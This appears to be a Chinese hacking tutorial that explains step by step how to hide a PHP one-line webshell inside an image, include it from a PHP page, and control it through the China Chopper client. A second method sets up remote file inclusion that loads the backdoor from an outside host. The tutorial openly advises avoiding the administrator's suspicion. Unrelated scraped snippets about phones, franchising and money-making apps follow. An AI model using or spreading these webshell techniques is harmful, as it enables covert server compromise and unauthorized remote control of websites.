我们平时藏匿图片后门是什么流程呢?我们来看一下
1、建立一个eval.php文件,上面加入我们的后门:
1 | <?phpassert($_POST[feiji]);?> |
2、找一张图片1.jpg,更好是从目标网站上下载下来的图片。
3、合并图片和php后门:
1 | Copy/bC:\xampp\htdocs\images\1.jpg+C:\xampp\htdocs\images\eval.phpC:\xampp\htdocs\images\2.jpg |
4、在任何一个php文件中包含这个2.jpg的图片后门,这里以images.php为例,写入以下的代码:
1 | <?phpinclude(‘2.jpg’);?> |
5、上传2.jpg和images.php,在菜刀里添加一句话后门:http://127.0.0.1/images/images.php,密码为feiji。
访问图片正常:
访问images.php页面出现乱码,但是后门已经正常运行:
但是一句话在菜刀里是可以解析成功的:
注:省去第3步也是可以的,只不过直接访问图片会乱码,会让管理员起疑心。
1、其实就是远程文件包含,也不只是针对图片,要求你有高权限,能够操纵Apache和修改php.ini文件:
修改ini的配置选项allow_url_fopen和allow_url_include为ON。
2、创建任何一个php文件中,以images.php为例,写入以下的代码:
1 | <?php$filename=$_GET['feiji'];include($filename);?> |
3、刚才做的图片后门jpg可以放在别的网站(http://www.xxxx.com)上,在菜刀里添加一句话后门:
http://127.0.0.1/images/images.php?feiji=https://www.hack56.com/images/ohtg1ki141p.jpg密码为feiji
注:这样做的优点是可以随时变换各种后门,缺点是很难获取到高权限。
比宾巴布兄弟察觉,年老的父母不习惯智能手机,很多功效无法实际实际操作。以手机截图为事例。实际上,年轻人可以实际实际操作它。出现异常朴素的方法是按2次电源变压器功能键和响声功能键。但对老年人来讲,“不记...
那一年侵入腾讯官方的网络黑客怎么样了 在在哪里黑客技术(黑客技术在哪里) 网络黑客是怎么操纵鼠标光标的呢 找自我私人帮助盗下QQ(北京市自我私人请保姆) 网络黑客怎祥在网络上请人...
很多人加盟一个项目,都会看这个项目是不是受人欢迎,是不是有着良好的口碑。吴记麻辣烫加盟的每一家连锁店铺生意都很红火,顾客也是络绎不绝,很值得加盟商加盟。吴记麻辣烫已经在市场中经营多年,积累了良好的消费...
伴随着电脑上的普及化,电脑上在大家的日常生活、工作中及其学习培训等各类主题活动中所充分发挥的功效愈来愈明显。可是,在应用的全过程中,电脑上会免不了的发生无法删掉的难除文档、中病毒及其没法卸载掉的手...
虽然现在已经过了吃小龙虾的季节,但这两天小龙虾也挺火的。由于一个微信挂机免费赚钱的平台取了这么个名字,相比传统微信挂机项目有自己自力APP,和挂挂赚一样有无限级提成奖励,提现门槛低,提现也秒到!那么一...
本文导读目录: 1、如果不给黑客鼠标键盘黑客还能入侵吗? 2、黑客和小白 3、用无线键盘安全吗? 4、黑客键盘怎么样 5、电影、电视剧中黑客猛敲键盘,屏幕满是看不懂的代码,是真的还是影...